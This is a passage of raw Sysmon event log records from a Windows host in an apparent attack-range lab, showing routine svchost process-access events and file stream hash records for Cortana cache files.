12:02:17.523{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{3F7F98FC-AA70-447B-8115-EB5A44909800}MD5=F4AF1310D8D92B88BAB00ECA2F49C398,SHA256=3130C6EC89917106856DA972EA6157791A6F8DD405164F86B7EF73F849A158DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{3A0E2E7D-9FED-42CB-8877-33CF7980ECDA}MD5=544AC2AEF10A0AAC6646D5D372CC839A,SHA256=E402AAF80000D1AE4C9C731B2D45E9E1D707C1F9ED0935EF065968C47306E85E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{38A89348-B3AE-479E-9816-8957D41F333A}MD5=7E65C5A57A575C58A5405595565EA22E,SHA256=9FA31C4A02F57CEF0DE517567F7D218DA51B530A387E6198F25B60967C43AEA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{33E693A3-517A-4347-A45E-3E8F1A25B030}MD5=1A1A2950F1D4A9770DF78E6CD2BCACC2,SHA256=28EA58D31BC5379C5760FC79481AFFAD0E1A132AAC6C794D8C849D6BDED9AE1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{3039DC32-E634-4F64-AD60-9038F8E7D74E}MD5=D073912E2B55F885ADC380FB3849A88D,SHA256=3D6632DD180019CC415F024A5C0724886E4F5E90116E78F5B390E09475C8A1C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{2D2370BB-9EFA-4648-B021-63A266D97A51}MD5=B590C6A1DBD4BAE99FED3744E0898536,SHA256=FEA47174536A406B031F040F394417218427405C4EB30558D6126A1AA79F6005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{24A5753E-C22E-49F4-BC08-F780BC6B1286}MD5=F3EFEAA4A73DB4D7D39C729FDE3305A7,SHA256=8C33FC0D66799635812F0F5F96B35C699ACAC5753DB1FFA89DA9520C81CAE9F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.507{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1F6412A2-2B23-4074-A89D-9586B3CFBF11}MD5=9A987ABDC3B59D4D4E488190C758BC8A,SHA256=F9B1BF1FC533A009213B23911DBA90DF8E914BB93C458D7A86C89D8546AE1FEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1CC42A14-06FE-4766-987D-39817BF3005F}MD5=3700764E031A12B2220A2C082EF7BBBE,SHA256=A772660D39E4150FB6017A0FDBDE096EB17128774678A018BFFEDCDB507101F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{19AC3423-5AC0-4CD7-9E2B-DB6C0DECE3C4}MD5=9001B10995D8FDABC78945D7B210649D,SHA256=92818CA4F5FB7F3808ABFDE9EFED7E2292FBE9195366132EDB50F3A246CA00B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005116Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{03152E59-DE8A-4AF5-8757-7FF15DC09A3C}MD5=25917526232EBDB7DE54634BFB5E6A33,SHA256=467251FCB3C564947AA615B69ECFC765763BBAA61B47CA13FD1895307E30125E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005115Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.492{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005114Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.476{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].pngMD5=A98EF91236D0A680740A3C0F10937087,SHA256=660FDBEDE1BFFF4F5F322F2DD862445A2BE9101828A32013843E5F6E0320D804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005113Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.476{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].htmlMD5=CDD4A14258DC43D22C37F1E721AEC245,SHA256=0D9E19723D9ED66DD13CB8657808963130BAD94249F03228CCC68BB32FC360C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005112Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.476{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\2\appcache[1].manMD5=9C09D8D73BB5BB4E83BE6D75D117BCDA,SHA256=F34BC09B3486A486AABF2BE3A3E6728A5FCD17821CAF41CFAC78CE85A63C6AC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005111Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.476{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txtMD5=F98851A644D901C32D1152CF001C2A30,SHA256=8A450F4631B7F451F470B7E7EF723A872C962749001C75AB1E9A01FC2765766A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005110Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txtMD5=5B7A3FBF6CE7627737B7AE8F7F73AF2B,SHA256=E5C8A584A8EF5082455DF1B7D986CDF9160F0A5AFA0EC6FD360EAAB9A1A8C5C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005109Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txtMD5=FF638505C57813F0F9115CB2F853BC07,SHA256=18695997D547308B565AA0D9AC8FDF8981966A47AF431DCC943BCC882AB6ECB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005108Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txtMD5=E68A5D04BF606560BDC326154A025956,SHA256=C32FBB255C914DA8336038933E799C5FEC8D50A0661B78DAB9E312131E7B7637,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txtMD5=10D7D30E23DBC108EC78C03F9E741566,SHA256=99355DBE0DDE1F5390AF8BA6FEB736E85B00C13E8D08B560DFE2D7EC5465E8C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txtMD5=D20D4B52F55421E4F0EE293FA394F274,SHA256=6594DB803F6BEAC699E3B4FE1BFFF9F1A6C8B7D1CB43A9A92A7D6979EE62B9ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.460{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txtMD5=766B33AB225A94D22C45803D32D1D2C4,SHA256=8BF750226E7E4720AFCD86820D0752946ABB11DB79EF62AFFA61EEC941AB5C20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txtMD5=6B559E6B268CC53FC0293A706E970550,SHA256=9179C223831AE54A2A21E24B1BDBD1D06C00098FA2A664F476756CEFA56C71E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txtMD5=87C5803AC86277335317BEEC5B252EF0,SHA256=8F7211EC0F4E0532DB653FECB4F605EB4C3C6C9879B138185DB4AAF7245646BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txtMD5=1DE957E6ECB8E53F1849E98E56D5D8F8,SHA256=D60A1010C3D82CAABA7C755C3A6423D7A268BCDC9EA4F27B10E8E14FD84ACD24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txtMD5=A6A758B9A843A9AE35166154D051C654,SHA256=59BEC20EBDB4ABAD19803E90044333A5781C755A3DDC0663A4A95E88AA0F45DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.445{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7213F95045C33C65F6877413CF1EC549,SHA256=DE470077BD70A5EF74EE7FBB07DABDBC71DD021CEFF05751A044C0453AB59A22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.429{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txtMD5=4EA6D9CCAE439451E3EDC69589C21F52,SHA256=115EE9EFD86B0AB505977609DBC1409CAD55275ED187667B37C1F7453406AA7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.429{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txtMD5=7F25769992DF13C241A1F14C72781B7F,SHA256=C3F1170A49C7EE2CF721D222FA1F766543D0F69BBCB35BFA2C64453025365DA1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.429{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.414{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txtMD5=D2ECB824C1EBD5CAD726A8FA730F83BD,SHA256=9BA9C472659B68EC59A470063958FCF4C1B9F95670B884F95FF690DA601CADA6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 